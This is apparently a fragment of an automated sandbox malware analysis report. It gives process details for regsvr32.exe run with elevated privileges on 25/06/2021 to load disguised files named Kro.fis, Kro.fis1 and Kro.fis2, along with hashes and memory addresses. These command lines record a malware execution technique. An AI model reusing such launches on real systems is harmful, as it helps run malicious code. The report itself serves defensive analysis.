                                                                                                                                                  Imagebase:0x9c0000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:18:50:58
                                                                                                                                                  Start date:25/06/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 ..\Kro.fis
                                                                                                                                                  Imagebase:0x12e0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:18:50:59
                                                                                                                                                  Start date:25/06/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 ..\Kro.fis1
                                                                                                                                                  Imagebase:0x12e0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:18:50:59
                                                                                                                                                  Start date:25/06/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 ..\Kro.fis2
                                                                                                                                                  Imagebase:0x12e0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >